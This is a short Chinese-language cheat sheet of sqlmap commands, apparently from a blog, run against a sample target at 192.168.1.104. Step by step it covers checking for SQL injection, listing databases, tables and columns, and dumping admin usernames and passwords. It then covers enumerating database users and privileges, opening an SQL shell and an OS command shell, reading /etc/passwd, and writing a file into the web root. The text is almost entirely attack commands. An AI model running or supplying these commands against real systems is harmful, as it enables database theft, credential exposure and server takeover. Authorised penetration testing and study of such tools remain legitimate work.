共计 1827 个字符,预计需要花费 5 分钟才能阅读完成。
SQLmap 是一种开源的渗透测试工具,主要用于检测和利用 SQL 注入漏洞。
它能够自动检测目标网站是否存在 SQL 注入漏洞,并通过利用这些漏洞来获取敏感信息、修改数据,甚至完全控制目标系统。
想要查看更多的命令可以参考用 ”sqlmap -hh” 查看完整的命令帮助文档。
一、Sqlmap 注入篇
1、检查注入点
root@kali:/# sqlmap -u http://192.168.1.104/sql.php?id=11
2、爆所有数据库信息
root@kali:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --dbs
爆当前数据库信息
root@kali:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --current-db
3、列出指定数据库所有的表名
root@kali:/# sqlmap -u http://192.168.1.104/sql.php?id=11 -D fujieace --tables
‘fujieace’ 为指定数据库名称
4、列出指定表名的所有列名
root@kali:/# sqlmap -u http://192.168.1.104/sql.php?id=11 -D vhost48330 -T admin --columns
‘admin’ 为指定表名称
5、dump 打印输出表名指定列名字段的值数据
root@kali:/# sqlmap -u http://192.168.1.104/sql.php?id=11 -D vhost48330 -T admin -C name,password --dump
‘name,password’ 为指定字段名称
二、Sqlmap 用户权限篇
1、列出数据库管理系统用户:
root@kali:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --users
查看当前连接数据库用户:
root@kali:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --current-user
2、判断当前用户是否是 DBA?
root@kali:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --is-dba
3、查看用户权限:
root@kali:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --privileges
root@kali:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --privileges -U fujieace
三、Sqlmap 文件操作与 shell 提权篇
1、sql shell
这里通过 sqlmap 可以直接获取一个 sql shell,直接执行 sql 语句进行交互。
root@kali:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --sql-shell
sql-shell> select version();
注意:这里由于进入了 sql shell 可以执行 sql 语句了,也可以用 load data infile、load_file、into outfile 等函数来进行文件读取或写入;
2、cmd shell
这里通过 sqlmap 可以直接获取一个 cmd shell,直接执行 cmd 命令进行交互。
root@kali:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --os-shell
root@kali:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --os-cmd=ipconfig
3、读取服务器上指定文件
root@kali:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --file-read=/etc/passwd
root@kali:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --file-read=d:/test.txt
4、写入本地文件到服务器上
root@kali:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --file-write /test/test.txt --file-dest /var/www/html/1.txt
正文完